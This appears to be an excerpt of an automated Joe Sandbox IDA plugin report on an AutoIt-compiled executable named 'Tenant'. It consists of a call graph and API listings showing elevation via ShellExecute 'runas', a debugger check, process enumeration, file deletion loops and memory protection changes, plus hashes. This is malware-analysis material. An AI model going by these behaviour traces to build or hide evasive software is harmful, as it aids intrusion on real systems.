99155 
ac8a4d 58 API calls 2 library calls 99130->99155 99133 ac9edd 99153 aca3f8 58 API calls 6 library calls 99133->99153 99134 ac9f05 99136 ac9f0c 99134->99136 99137 ac9f1b 99134->99137 99156 ac8d58 58 API calls __getptd_noexit 99136->99156 99142 ac9e3b __lock 58 API calls 99137->99142 99138->99124 99139 ac9ee4 99154 ac32cf GetModuleHandleExW GetProcAddress ExitProcess ___crtCorExitProcess 99139->99154 99144 ac9f22 99142->99144 99145 ac9f2f 99144->99145 99146 ac9f47 99144->99146 99157 aca05b InitializeCriticalSectionAndSpinCount 99145->99157 99158 ac2f85 99146->99158 99149 ac9f3b 99164 ac9f63 LeaveCriticalSection _doexit 99149->99164 99152->99133 99153->99139 99155->99134 99156->99138 99157->99149 99159 ac2f8e RtlFreeHeap 99158->99159 99163 ac2fb7 __dosmaperr 99158->99163 99160 ac2fa3 99159->99160 99159->99163 99165 ac8d58 58 API calls __getptd_noexit 99160->99165 99162 ac2fa9 GetLastError 99162->99163 99163->99149 99164->99138 99165->99162 99166->99111 99167->99112 99168->99115 99172 ac9fa5 LeaveCriticalSection 99169->99172 99171 ac2eb7 99171->99102 99172->99171 99173 aa9a88 99174 aa86e0 274 API calls 99173->99174 99175 aa9a96 99174->99175 99176 aa9a6c 99179 aa829c 99176->99179 99178 aa9a78 99180 aa82b4 99179->99180 99187 aa8308 99179->99187 99181 aa53b0 274 API calls 99180->99181 99180->99187 99185 aa82eb 99181->99185 99183 ae0ed8 99183->99183 99184 aa8331 99184->99178 99185->99184 99186 aa523c 59 API calls 99185->99186 99186->99187 99187->99184 99188 b0a48d 89 API calls 4 library calls 99187->99188 99188->99183 99189 ab4d83 99190 ab4dba 99189->99190 99191 ab4dd8 99190->99191 99192 ab4e37 99190->99192 99233 ab4e35 99190->99233 99196 ab4ead PostQuitMessage 99191->99196 99197 ab4de5 99191->99197 99194 ab4e3d 99192->99194 99195 af09c2 99192->99195 99193 ab4e1a DefWindowProcW 99230 ab4e28 99193->99230 99198 ab4e42 99194->99198 99199 ab4e65 SetTimer RegisterWindowMessageW 99194->99199 99248 aac460 10 API calls Mailbox 99195->99248 99196->99230 99200 af0a35 99197->99200 
99201 ab4df0 99197->99201 99204 ab4e49 KillTimer 99198->99204 99205 af0965 99198->99205 99206 ab4e8e CreatePopupMenu 99199->99206 99199->99230 99262 b02cce 97 API calls _memset 99200->99262 99207 ab4df8 99201->99207 99208 ab4eb7 99201->99208 99203 af09e9 99249 aac483 274 API calls Mailbox 99203->99249 99241 ab5ac3 99204->99241 99213 af099e MoveWindow 99205->99213 99214 af096a 99205->99214 99206->99230 99216 af0a1a 99207->99216 99217 ab4e03 99207->99217 99234 ab5b29 99208->99234 99210 af0a47 99210->99193 99210->99230 99213->99230 99220 af096e 99214->99220 99221 af098d SetFocus 99214->99221 99216->99193 99261 af8854 59 API calls Mailbox 99216->99261 99218 ab4e9b 99217->99218 99219 ab4e0e 99217->99219 99246 ab5bd7 107 API calls _memset 99218->99246 99219->99193 99229 ab5ac3 Shell_NotifyIconW 99219->99229 99220->99219 99224 af0977 99220->99224 99221->99230 99247 aac460 10 API calls Mailbox 99224->99247 99227 ab4eab 99227->99230 99231 af0a0e 99229->99231 99250 ab59d3 99231->99250 99233->99193 99235 ab5bc2 99234->99235 99236 ab5b40 _memset 99234->99236 99235->99230 99263 ab56f8 99236->99263 99238 ab5bab KillTimer SetTimer 99238->99235 99239 ab5b67 99239->99238 99240 af0d6e Shell_NotifyIconW 99239->99240 99240->99238 99242 ab4e5c 99241->99242 99243 ab5ad5 _memset 99241->99243 99245 aa34e4 DeleteObject DestroyWindow Mailbox 99242->99245 99244 ab5af4 Shell_NotifyIconW 99243->99244 99244->99242 99245->99230 99246->99227 99247->99230 99248->99203 99249->99219 99251 ab59fe _memset 99250->99251 99300 ab5800 99251->99300 99254 ab5a83 99256 ab5ab9 Shell_NotifyIconW 99254->99256 99257 ab5a9d Shell_NotifyIconW 99254->99257 99258 ab5aab 99256->99258 99257->99258 99259 ab56f8 87 API calls 99258->99259 99260 ab5ab2 99259->99260 99260->99233 99261->99233 99262->99210 99264 ab5715 99263->99264 99284 ab57fa Mailbox 99263->99284 99293 ab162d 99264->99293 99267 af0c4c LoadStringW 99271 af0c66 99267->99271 99268 ab5730 99269 ab1821 59 API calls 99268->99269 99270 ab5745 99269->99270 99272 
ab5752 99270->99272 99278 af0c74 99270->99278 99273 ab1c9c 59 API calls 99271->99273 99272->99271 99274 ab5760 99272->99274 99279 ab5778 _memset _wcscpy 99273->99279 99275 ab1900 59 API calls 99274->99275 99276 ab576a 99275->99276 99277 ab17e0 59 API calls 99276->99277 99277->99279 99278->99279 99280 af0cb7 Mailbox 99278->99280 99281 ab1207 59 API calls 99278->99281 99282 ab57e0 Shell_NotifyIconW 99279->99282 99299 ac38c8 83 API calls 3 library calls 99280->99299 99283 af0c9e 99281->99283 99282->99284 99298 b00252 60 API calls Mailbox 99283->99298 99284->99239 99287 af0ca9 99289 ab17e0 59 API calls 99287->99289 99288 af0cd6 99290 ab1900 59 API calls 99288->99290 99289->99280 99291 af0ce7 99290->99291 99292 ab1900 59 API calls 99291->99292 99292->99279 99294 ac0fe6 Mailbox 59 API calls 99293->99294 99295 ab1652 99294->99295 99296 ac0fe6 Mailbox 59 API calls 99295->99296 99297 ab1660 99296->99297 99297->99267 99297->99268 99298->99287 99299->99288 99301 ab581c 99300->99301 99302 ab5810 99300->99302 99301->99302 99303 ab5821 DestroyIcon 99301->99303 99302->99254 99304 b034dd 62 API calls _W_store_winword 99302->99304 99303->99302 99304->99254 99305 aa1066 99310 aaaaaa 99305->99310 99307 aa106c 99308 ac2f70 __cinit 67 API calls 99307->99308 99309 aa1076 99308->99309 99311 aaaacb 99310->99311 99343 ac02eb 99311->99343 99315 aaab12 99316 ab1207 59 API calls 99315->99316 99317 aaab1c 99316->99317 99318 ab1207 59 API calls 99317->99318 99319 aaab26 99318->99319 99320 ab1207 59 API calls 99319->99320 99321 aaab30 99320->99321 99322 ab1207 59 API calls 99321->99322 99323 aaab6e 99322->99323 99324 ab1207 59 API calls 99323->99324 99325 aaac39 99324->99325 99353 ac0588 99325->99353 99329 aaac6b 99330 ab1207 59 API calls 99329->99330 99331 aaac75 99330->99331 99381 abfe2b 99331->99381 99333 aaacbc 99334 aaaccc GetStdHandle 99333->99334 99335 aaad18 99334->99335 99336 ae2f39 99334->99336 99337 aaad20 OleInitialize 99335->99337 99336->99335 99338 ae2f42 99336->99338 99337->99307 
99388 b070f3 64 API calls Mailbox 99338->99388 99340 ae2f49 99389 b077c2 CreateThread 99340->99389 99342 ae2f55 CloseHandle 99342->99337 99390 ac03c4 99343->99390 99346 ac03c4 59 API calls 99347 ac032d 99346->99347 99348 ab1207 59 API calls 99347->99348 99349 ac0339 99348->99349 99350 ab1821 59 API calls 99349->99350 99351 aaaad1 99350->99351 99352 ac07bb 6 API calls 99351->99352 99352->99315 99354 ab1207 59 API calls 99353->99354 99355 ac0598 99354->99355 99356 ab1207 59 API calls 99355->99356 99357 ac05a0 99356->99357 99397 ab10c3 99357->99397 99360 ab10c3 59 API calls 99361 ac05b0 99360->99361 99362 ab1207 59 API calls 99361->99362 99363 ac05bb 99362->99363 99364 ac0fe6 Mailbox 59 API calls 99363->99364 99365 aaac43 99364->99365 99366 abff4c 99365->99366 99367 abff5a 99366->99367 99368 ab1207 59 API calls 99367->99368 99369 abff65 99368->99369 99370 ab1207 59 API calls 99369->99370 99371 abff70 99370->99371 99372 ab1207 59 API calls 99371->99372 99373 abff7b 99372->99373 99374 ab1207 59 API calls 99373->99374 99375 abff86 99374->99375 99376 ab10c3 59 API calls 99375->99376 99377 abff91 99376->99377 99378 ac0fe6 Mailbox 59 API calls 99377->99378 99379 abff98 RegisterWindowMessageW 99378->99379 99379->99329 99382 abfe3b 99381->99382 99383 af620c 99381->99383 99384 ac0fe6 Mailbox 59 API calls 99382->99384 99400 b0a12a 59 API calls 99383->99400 99387 abfe43 99384->99387 99386 af6217 99387->99333 99388->99340 99389->99342 99401 b077a8 65 API calls 99389->99401 99391 ab1207 59 API calls 99390->99391 99392 ac03cf 99391->99392 99393 ab1207 59 API calls 99392->99393 99394 ac03d7 99393->99394 99395 ab1207 59 API calls 99394->99395 99396 ac0323 99395->99396 99396->99346 99398 ab1207 59 API calls 99397->99398 99399 ab10cb 99398->99399 99399->99360 99400->99386 99402 ade463 99414 aa373a 99402->99414 99404 ade479 99405 ade48f 99404->99405 99406 ade4fa 99404->99406 99423 aa5376 60 API calls 99405->99423 99408 aab020 274 API calls 99406->99408 99413 ade4ee Mailbox 99408->99413 
99410 ade4ce 99410->99413 99424 b0890a 59 API calls Mailbox 99410->99424 99411 adf046 Mailbox 99413->99411 99425 b0a48d 89 API calls 4 library calls 99413->99425 99415 aa3758 99414->99415 99416 aa3746 99414->99416 99417 aa375e 99415->99417 99418 aa3787 99415->99418 99419 aa523c 59 API calls 99416->99419 99420 ac0fe6 Mailbox 59 API calls 99417->99420 99421 aa523c 59 API calls 99418->99421 99422 aa3750 99419->99422 99420->99422 99421->99422 99422->99404 99423->99410 99424->99413 99425->99411 99426 ac7e83 99427 ac7e8f ___lock_fhandle 99426->99427 99463 aca038 GetStartupInfoW 99427->99463 99429 ac7e94 99465 ac8dac GetProcessHeap 99429->99465 99431 ac7eec 99432 ac7ef7 99431->99432 99548 ac7fd3 58 API calls 3 library calls 99431->99548 99466 ac9d16 99432->99466 99435 ac7efd 99436 ac7f08 __RTC_Initialize 99435->99436 99549 ac7fd3 58 API calls 3 library calls 99435->99549 99487 acd802 99436->99487 99439 ac7f17 99440 ac7f23 GetCommandLineW 99439->99440 99550 ac7fd3 58 API calls 3 library calls 99439->99550 99506 ad5153 GetEnvironmentStringsW 99440->99506 99443 ac7f22 99443->99440 99446 ac7f3d 99447 ac7f48 99446->99447 99551 ac32e5 58 API calls 3 library calls 99446->99551 99516 ad4f88 99447->99516 99450 ac7f4e 99453 ac7f59 99450->99453 99552 ac32e5 58 API calls 3 library calls 99450->99552 99530 ac331f 99453->99530 99454 ac7f61 99455 ac7f6c __wwincmdln 99454->99455 99553 ac32e5 58 API calls 3 library calls 99454->99553 99536 ab5f8b 99455->99536 99458 ac7f80 99459 ac7f8f 99458->99459 99554 ac3588 58 API calls _doexit 99458->99554 99555 ac3310 58 API calls _doexit 99459->99555 99462 ac7f94 ___lock_fhandle 99464 aca04e 99463->99464 99464->99429 99465->99431 99556 ac33b7 36 API calls 2 library calls 99466->99556 99468 ac9d1b 99557 ac9f6c InitializeCriticalSectionAndSpinCount ___lock_fhandle 99468->99557 99470 ac9d20 99471 ac9d24 99470->99471 99559 ac9fba TlsAlloc 99470->99559 99558 ac9d8c 61 API calls 2 library calls 99471->99558 99474 ac9d29 99474->99435 99475 ac9d36 
                                                                                        APIs
                                                                                        • GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 00AB526C
                                                                                        • IsDebuggerPresent.KERNEL32 ref: 00AB527E
                                                                                        • GetFullPathNameW.KERNEL32(00007FFF,?,?), ref: 00AB52E6
                                                                                          • Part of subcall function 00AB1821: _memmove.LIBCMT ref: 00AB185B
                                                                                          • Part of subcall function 00AABBC6: GetFullPathNameW.KERNEL32(?,00007FFF,?,?), ref: 00AABC07
                                                                                        • SetCurrentDirectoryW.KERNEL32(?), ref: 00AB5366
                                                                                        • MessageBoxA.USER32(00000000,It is a violation of the AutoIt EULA to attempt to reverse engineer this program.,AutoIt,00000010), ref: 00AF0B2E
                                                                                        • SetCurrentDirectoryW.KERNEL32(?), ref: 00AF0B66
                                                                                        • GetForegroundWindow.USER32(runas,?,?,?,00000001,?,00B56D10), ref: 00AF0BE9
                                                                                        • ShellExecuteW.SHELL32(00000000), ref: 00AF0BF0
                                                                                          • Part of subcall function 00AB514C: GetSysColorBrush.USER32(0000000F), ref: 00AB5156
                                                                                          • Part of subcall function 00AB514C: LoadCursorW.USER32(00000000,00007F00), ref: 00AB5165
                                                                                          • Part of subcall function 00AB514C: LoadIconW.USER32(00000063), ref: 00AB517C
                                                                                          • Part of subcall function 00AB514C: LoadIconW.USER32(000000A4), ref: 00AB518E
                                                                                          • Part of subcall function 00AB514C: LoadIconW.USER32(000000A2), ref: 00AB51A0
                                                                                          • Part of subcall function 00AB514C: LoadImageW.USER32(00000063,00000001,00000010,00000010,00000000), ref: 00AB51C6
                                                                                          • Part of subcall function 00AB514C: RegisterClassExW.USER32(?), ref: 00AB521C
                                                                                          • Part of subcall function 00AB50DB: CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 00AB5109
                                                                                          • Part of subcall function 00AB50DB: CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 00AB512A
                                                                                          • Part of subcall function 00AB50DB: ShowWindow.USER32(00000000), ref: 00AB513E
                                                                                          • Part of subcall function 00AB50DB: ShowWindow.USER32(00000000), ref: 00AB5147
                                                                                          • Part of subcall function 00AB59D3: _memset.LIBCMT ref: 00AB59F9
                                                                                          • Part of subcall function 00AB59D3: Shell_NotifyIconW.SHELL32(00000000,?), ref: 00AB5A9E
                                                                                        Strings
                                                                                        • AutoIt, xrefs: 00AF0B23
                                                                                        • runas, xrefs: 00AF0BE4
                                                                                        • It is a violation of the AutoIt EULA to attempt to reverse engineer this program., xrefs: 00AF0B28
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000B.00000002.4068879249.0000000000AA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00AA0000, based on PE: true
                                                                                         • Associated: 0000000B.00000002.4068857733.0000000000AA0000.00000002.00000001.01000000.00000006.sdmp
                                                                                         • Associated: 0000000B.00000002.4068931266.0000000000B30000.00000002.00000001.01000000.00000006.sdmp
                                                                                         • Associated: 0000000B.00000002.4068931266.0000000000B56000.00000002.00000001.01000000.00000006.sdmp
                                                                                         • Associated: 0000000B.00000002.4068982580.0000000000B60000.00000004.00000001.01000000.00000006.sdmp
                                                                                         • Associated: 0000000B.00000002.4069002034.0000000000B69000.00000002.00000001.01000000.00000006.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_11_2_aa0000_Tenant.jbxd
                                                                                        Similarity
                                                                                        • API ID: LoadWindow$Icon$CurrentDirectory$CreateFullNamePathShow$BrushClassColorCursorDebuggerExecuteForegroundImageMessageNotifyPresentRegisterShellShell__memmove_memset
                                                                                        • String ID: AutoIt$It is a violation of the AutoIt EULA to attempt to reverse engineer this program.$runas
                                                                                        • API String ID: 529118366-2030392706
                                                                                        • Opcode ID: f16595d0b14e2348e007bd137f74b49371a2025e0637856323ccf2e416489cfc
                                                                                        • Instruction ID: 9f1512646105e9d5598054ffb35107094d177aaa7bb1c84c640ae3936414db00
                                                                                        • Opcode Fuzzy Hash: f16595d0b14e2348e007bd137f74b49371a2025e0637856323ccf2e416489cfc
                                                                                        • Instruction Fuzzy Hash: 1951D031D88248AACF11ABF0DD76EFE7BBCAF06344B1001A5F551672A3DEB84944CB21
                                                                                        APIs
                                                                                        • GetVersionExW.KERNEL32(?), ref: 00AB5D40
                                                                                          • Part of subcall function 00AB1821: _memmove.LIBCMT ref: 00AB185B
                                                                                        • GetCurrentProcess.KERNEL32(?,00B30A18,00000000,00000000,?), ref: 00AB5E07
                                                                                        • IsWow64Process.KERNEL32(00000000), ref: 00AB5E0E
                                                                                        • GetNativeSystemInfo.KERNEL32(00000000), ref: 00AB5E54
                                                                                        • FreeLibrary.KERNEL32(00000000), ref: 00AB5E5F
                                                                                        • GetSystemInfo.KERNEL32(00000000), ref: 00AB5E90
                                                                                        • GetSystemInfo.KERNEL32(00000000), ref: 00AB5E9C
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000B.00000002.4068879249.0000000000AA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00AA0000, based on PE: true
                                                                                         • Associated: 0000000B.00000002.4068857733.0000000000AA0000.00000002.00000001.01000000.00000006.sdmp
                                                                                         • Associated: 0000000B.00000002.4068931266.0000000000B30000.00000002.00000001.01000000.00000006.sdmp
                                                                                         • Associated: 0000000B.00000002.4068931266.0000000000B56000.00000002.00000001.01000000.00000006.sdmp
                                                                                         • Associated: 0000000B.00000002.4068982580.0000000000B60000.00000004.00000001.01000000.00000006.sdmp
                                                                                         • Associated: 0000000B.00000002.4069002034.0000000000B69000.00000002.00000001.01000000.00000006.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_11_2_aa0000_Tenant.jbxd
                                                                                        Similarity
                                                                                        • API ID: InfoSystem$Process$CurrentFreeLibraryNativeVersionWow64_memmove
                                                                                        • String ID:
                                                                                        • API String ID: 1986165174-0
                                                                                        • Opcode ID: a1ff261a93b37dc7bd55b4784245c8c01db2fb209d8269a2da762ff03a9b2ca1
                                                                                        • Instruction ID: 710af50550e72c0e6ca5e86e9047458b0b6eb99a179b4b0b9ef2c3e2af0e143f
                                                                                        • Opcode Fuzzy Hash: a1ff261a93b37dc7bd55b4784245c8c01db2fb209d8269a2da762ff03a9b2ca1
                                                                                        • Instruction Fuzzy Hash: 7091B431949BC4DEC732DB7884616EABFF96F25300B980A5EE0C793A42D630F648C759
                                                                                        APIs
                                                                                          • Part of subcall function 00AC0284: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00AB2A58,?,00008000), ref: 00AC02A4
                                                                                          • Part of subcall function 00B04FEC: GetFileAttributesW.KERNEL32(?,00B03BFE), ref: 00B04FED
                                                                                        • FindFirstFileW.KERNEL32(?,?), ref: 00B0407C
                                                                                        • DeleteFileW.KERNEL32(?,?,?,?), ref: 00B040CC
                                                                                        • FindNextFileW.KERNELBASE(00000000,00000010), ref: 00B040DD
                                                                                        • FindClose.KERNEL32(00000000), ref: 00B040F4
                                                                                        • FindClose.KERNEL32(00000000), ref: 00B040FD
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000B.00000002.4068879249.0000000000AA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00AA0000, based on PE: true
                                                                                         • Associated: 0000000B.00000002.4068857733.0000000000AA0000.00000002.00000001.01000000.00000006.sdmp
                                                                                         • Associated: 0000000B.00000002.4068931266.0000000000B30000.00000002.00000001.01000000.00000006.sdmp
                                                                                         • Associated: 0000000B.00000002.4068931266.0000000000B56000.00000002.00000001.01000000.00000006.sdmp
                                                                                         • Associated: 0000000B.00000002.4068982580.0000000000B60000.00000004.00000001.01000000.00000006.sdmp
                                                                                         • Associated: 0000000B.00000002.4069002034.0000000000B69000.00000002.00000001.01000000.00000006.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_11_2_aa0000_Tenant.jbxd
                                                                                        Similarity
                                                                                        • API ID: FileFind$Close$AttributesDeleteFirstFullNameNextPath
                                                                                        • String ID: \*.*
                                                                                        • API String ID: 2649000838-1173974218
                                                                                        • Opcode ID: 39e1938bd0621943543e66ab1b6ad2cfddc2d5dd23782581f80a285d781eca5b
                                                                                        • Instruction ID: efd27bbc64aac220b0cf459f108500f774382d73192c8391ec53d3fb06307b10
                                                                                        • Opcode Fuzzy Hash: 39e1938bd0621943543e66ab1b6ad2cfddc2d5dd23782581f80a285d781eca5b
                                                                                        • Instruction Fuzzy Hash: 153162710183859BC305EF60C9A5DEFBBECBE95304F440A6DF5D5931D2EB219909C752
                                                                                        APIs
                                                                                        • CreateToolhelp32Snapshot.KERNEL32 ref: 00B0416D
                                                                                        • Process32FirstW.KERNEL32(00000000,?), ref: 00B0417B
                                                                                        • Process32NextW.KERNEL32(00000000,?), ref: 00B0419B
                                                                                        • FindCloseChangeNotification.KERNEL32(00000000), ref: 00B04245
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000B.00000002.4068879249.0000000000AA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00AA0000, based on PE: true
                                                                                         • Associated: 0000000B.00000002.4068857733.0000000000AA0000.00000002.00000001.01000000.00000006.sdmp
                                                                                         • Associated: 0000000B.00000002.4068931266.0000000000B30000.00000002.00000001.01000000.00000006.sdmp
                                                                                         • Associated: 0000000B.00000002.4068931266.0000000000B56000.00000002.00000001.01000000.00000006.sdmp
                                                                                         • Associated: 0000000B.00000002.4068982580.0000000000B60000.00000004.00000001.01000000.00000006.sdmp
                                                                                         • Associated: 0000000B.00000002.4069002034.0000000000B69000.00000002.00000001.01000000.00000006.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_11_2_aa0000_Tenant.jbxd
                                                                                        Similarity
                                                                                        • API ID: Process32$ChangeCloseCreateFindFirstNextNotificationSnapshotToolhelp32
                                                                                        • String ID:
                                                                                        • API String ID: 3243318325-0
                                                                                        • Opcode ID: a7881d1a5b5aa5879e6b8263bd7afb977772396e4728eb4a30479ee35c9f7a65
                                                                                        • Instruction ID: 99b40e7ea6e161db075e7c8b5ddbeec0d448811898886a4904b1ac11ed560530
                                                                                        • Opcode Fuzzy Hash: a7881d1a5b5aa5879e6b8263bd7afb977772396e4728eb4a30479ee35c9f7a65
                                                                                        • Instruction Fuzzy Hash: D73182B11083419FD300EF50D995AAFBBE8FF95350F50052DF585931E2EB719949CB52
                                                                                        APIs
                                                                                          • Part of subcall function 00AB3740: CharUpperBuffW.USER32(?,00B671DC,00000000,?,00000000,00B671DC,?,00AA53A5,?,?,?,?), ref: 00AB375D
                                                                                        • _memmove.LIBCMT ref: 00AAB68A
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000B.00000002.4068879249.0000000000AA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00AA0000, based on PE: true
                                                                                         • Associated: 0000000B.00000002.4068857733.0000000000AA0000.00000002.00000001.01000000.00000006.sdmp
                                                                                         • Associated: 0000000B.00000002.4068931266.0000000000B30000.00000002.00000001.01000000.00000006.sdmp
                                                                                         • Associated: 0000000B.00000002.4068931266.0000000000B56000.00000002.00000001.01000000.00000006.sdmp
                                                                                         • Associated: 0000000B.00000002.4068982580.0000000000B60000.00000004.00000001.01000000.00000006.sdmp
                                                                                         • Associated: 0000000B.00000002.4069002034.0000000000B69000.00000002.00000001.01000000.00000006.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_11_2_aa0000_Tenant.jbxd
                                                                                        Similarity
                                                                                        • API ID: BuffCharUpper_memmove
                                                                                        • String ID:
                                                                                        • API String ID: 2819905725-0
                                                                                        • Opcode ID: 5a4bcf5116274a260788e53a1011dfcb88cb994a77ebe3a8d99928ab20e1e15e
                                                                                        • Instruction ID: 7076c2ae83316b8a3cd69dc9795a5f460f7bcaeb9562788911852c050c5e3a42
                                                                                        • Opcode Fuzzy Hash: 5a4bcf5116274a260788e53a1011dfcb88cb994a77ebe3a8d99928ab20e1e15e
                                                                                        • Instruction Fuzzy Hash: AFA27A716083419FDB20CF15C584B6AB7F1BF8A304F14895DE89A8B3A2D771ED45CBA2
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000B.00000002.4068879249.0000000000AA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00AA0000, based on PE: true
                                                                                         • Associated: 0000000B.00000002.4068857733.0000000000AA0000.00000002.00000001.01000000.00000006.sdmp
                                                                                         • Associated: 0000000B.00000002.4068931266.0000000000B30000.00000002.00000001.01000000.00000006.sdmp
                                                                                         • Associated: 0000000B.00000002.4068931266.0000000000B56000.00000002.00000001.01000000.00000006.sdmp
                                                                                         • Associated: 0000000B.00000002.4068982580.0000000000B60000.00000004.00000001.01000000.00000006.sdmp
                                                                                         • Associated: 0000000B.00000002.4069002034.0000000000B69000.00000002.00000001.01000000.00000006.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_11_2_aa0000_Tenant.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 38d19f499aaeeedf7473d1fb13dcab8280177ba17731593048b8dd8ba3aaa656
                                                                                        • Instruction ID: 6f2511c5d6e86f5b44e1ad61cbdf30fa29c28f0264b4fe2dc4ba0da0d74f03c6
                                                                                        • Opcode Fuzzy Hash: 38d19f499aaeeedf7473d1fb13dcab8280177ba17731593048b8dd8ba3aaa656
                                                                                        • Instruction Fuzzy Hash: 13229A74E00216DFDB24DF58C480BAFB7B4FF4A300F248169E956AB391E774A985CB91
                                                                                        APIs
                                                                                        • FindCloseChangeNotification.KERNEL32 ref: 00AC0ED5
                                                                                        • NtProtectVirtualMemory.NTDLL ref: 00AC0EE7
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000B.00000002.4068879249.0000000000AA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00AA0000, based on PE: true
                                                                                         • Associated: 0000000B.00000002.4068857733.0000000000AA0000.00000002.00000001.01000000.00000006.sdmp
                                                                                         • Associated: 0000000B.00000002.4068931266.0000000000B30000.00000002.00000001.01000000.00000006.sdmp
                                                                                         • Associated: 0000000B.00000002.4068931266.0000000000B56000.00000002.00000001.01000000.00000006.sdmp
                                                                                         • Associated: 0000000B.00000002.4068982580.0000000000B60000.00000004.00000001.01000000.00000006.sdmp
                                                                                         • Associated: 0000000B.00000002.4069002034.0000000000B69000.00000002.00000001.01000000.00000006.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_11_2_aa0000_Tenant.jbxd
                                                                                        Similarity
                                                                                        • API ID: ChangeCloseFindMemoryNotificationProtectVirtual
                                                                                        • String ID:
                                                                                        • API String ID: 2672061364-0
                                                                                        • Opcode ID: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                                                                                        • Instruction ID: 85ff81d66449049bf7fbfe8e5b2fa3d286c208ab207f9380475e3c879d9ca85f
                                                                                        • Opcode Fuzzy Hash: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                                                                                        • Instruction Fuzzy Hash: 8B31B271A40109DBD718DF58C480E69FBB6FF59300B668AA9E41ACB251EB31EDC1CBC0
                                                                                        APIs
                                                                                        • timeGetTime.WINMM ref: 00AABF57
                                                                                          • Part of subcall function 00AA52B0: PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00AA52E6
                                                                                        • Sleep.KERNEL32(0000000A,?,?), ref: 00AE36B5
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000B.00000002.4068879249.0000000000AA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00AA0000, based on PE: true
                                                                                         • Associated: 0000000B.00000002.4068857733.0000000000AA0000.00000002.00000001.01000000.00000006.sdmp
                                                                                         • Associated: 0000000B.00000002.4068931266.0000000000B30000.00000002.00000001.01000000.00000006.sdmp
                                                                                         • Associated: 0000000B.00000002.4068931266.0000000000B56000.00000002.00000001.01000000.00000006.sdmp
                                                                                         • Associated: 0000000B.00000002.4068982580.0000000000B60000.00000004.00000001.01000000.00000006.sdmp
                                                                                         • Associated: 0000000B.00000002.4069002034.0000000000B69000.00000002.00000001.01000000.00000006.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_11_2_aa0000_Tenant.jbxd
                                                                                        Similarity
                                                                                        • API ID: MessagePeekSleepTimetime
                                                                                        • String ID: @COM_EVENTOBJ$@GUI_CTRLHANDLE$@GUI_CTRLID$@GUI_WINHANDLE$@TRAY_ID$CALL
                                                                                        • API String ID: 1792118007-922114024
                                                                                        • Opcode ID: 35394a57e658256816c805b38167c4651c8097b9c129193a867dfab33a8f4d6d
                                                                                        • Instruction ID: 65b84ec12cc99dc18072c7579d29c6aee7bc06fa0c47d9e4a16a95f983bc0855
                                                                                        • Opcode Fuzzy Hash: 35394a57e658256816c805b38167c4651c8097b9c129193a867dfab33a8f4d6d
                                                                                        • Instruction Fuzzy Hash: 93C2C071608381DFDB24DF25C994BAEBBE4BF85304F14491DF58A8B2A2CB71E944CB52
                                                                                        APIs
                                                                                        • GetSysColorBrush.USER32(0000000F), ref: 00AA3444
                                                                                        • RegisterClassExW.USER32(00000030), ref: 00AA346E
                                                                                        • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00AA347F
                                                                                        • InitCommonControlsEx.COMCTL32(?), ref: 00AA349C
                                                                                        • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 00AA34AC
                                                                                        • LoadIconW.USER32(000000A9), ref: 00AA34C2
                                                                                        • ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00AA34D1
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000B.00000002.4068879249.0000000000AA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00AA0000, based on PE: true
                                                                                        • Associated: 0000000B.00000002.4068857733.0000000000AA0000.00000002.00000001.01000000.00000006.sdmp
                                                                                        • Associated: 0000000B.00000002.4068931266.0000000000B30000.00000002.00000001.01000000.00000006.sdmp
                                                                                        • Associated: 0000000B.00000002.4068931266.0000000000B56000.00000002.00000001.01000000.00000006.sdmp
                                                                                        • Associated: 0000000B.00000002.4068982580.0000000000B60000.00000004.00000001.01000000.00000006.sdmp
                                                                                        • Associated: 0000000B.00000002.4069002034.0000000000B69000.00000002.00000001.01000000.00000006.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_11_2_aa0000_Tenant.jbxd
                                                                                        Similarity
                                                                                        • API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
                                                                                        • String ID: +$0$AutoIt v3 GUI$TaskbarCreated
